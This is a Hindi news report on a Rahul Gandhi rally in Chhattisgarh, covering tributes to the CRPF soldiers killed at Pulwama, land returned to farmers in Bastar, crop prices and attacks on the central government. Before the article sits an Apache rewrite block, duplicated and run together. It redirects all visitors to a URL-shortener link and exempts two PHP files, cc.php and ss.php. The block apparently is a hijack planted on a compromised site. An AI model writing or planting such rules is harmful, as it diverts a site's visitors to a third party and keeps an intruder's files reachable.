
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 349
Previous Nextछत्तीसगढ़ रैली में राहुल गांधी ने पुलवामा हमले पर बोलते हुए कहा कि जम्मू कश्मीर में जो सीआरपीएफ के जवान जिन्होंने कुर्बानी दी, शहीद हुए उनका हम याद करते हैं और अपना पूरा का पूरा प्यार उनके परिवारों को देते है।
इसके साथ ही, रैली को संबोधित करते हुए कांग्रेस अध्यक्ष ने केन्द्र सरकार पर बड़ा हमला बोला। राहुल ने कहा कि टाटा स्टील प्लांट के लिए जमीन ली गई थी, और उस पर दस साल तक काम नहीं हुआ। उसके बाद आप जमीन वापस चाहते थे। जब आप मेरे पास आए तो मैंने ये कहा था कि जमीन अधिग्रहण कानून के मुताबिक जो जमीन ली जाएगी वो उनसे पूछकर ली जाएगी। और अगर ऐसा होता है तो मार्केट रेट से पांच गुणा ज्यादा उन्हें दिया जाएगा। पांच साल तक अगर उस पर फैक्ट्री नहीं लगी तो वह जमीन उन किसानों को वापस दी जाएगी।
राहुल ने कहा कि बस्तर में उन किसानों को जमीन लौटाकर यह ऐतिहासिक काम किया है। राहुल ने कहा कि मैनें दूसरे वादे भी आपसे किया था कि आपका जल, जंगल और जमीन पर हक आपका है। इस पर उगने वाली चीजों का फायदा आपको मिलना चाहिए।
राहुल ने कहा कि जब बीजेपी की सरकार थी उस वक्त मैं पूछता था कि क्या दाम मिलता है? उस वक्त बीजेपी सरकार में लोग कहते थे कि चौदह सौ, पन्द्रह सौ मिलता था। लेकिन, अब कांग्रेस की सरकार में उन्हें पच्चीस सौ मिलता है।
राहुल ने कहा कि बीजेपी के पास पैसे की कोई कमी नहीं थी। लेकिन, वे आपका पैसा छीनकर वह अपनी या फिर उद्योगपतियों की जेब में डालते थे। राहुल ने केन्द्र सरकार पर निशाना साधते हुए कहा कि यह सरकार पांच वर्षों के दौरान सिर्फ उद्योगपतियों के कर्ज माफ किए हैं।
कांग्रेस अध्यक्ष ने कहा कि पीएम कहते है कि किसानों के लिए हम नई योजना लेकर आए हैं। लेकिन, जब कृषि मंत्री ने उन योजनाओं का ऐलान किया उसके बाद यह पता लगा यह कहा गया कि हिन्दुस्तान के किसानों के एक परिवार को 17 रूपये दिए जाएंगे।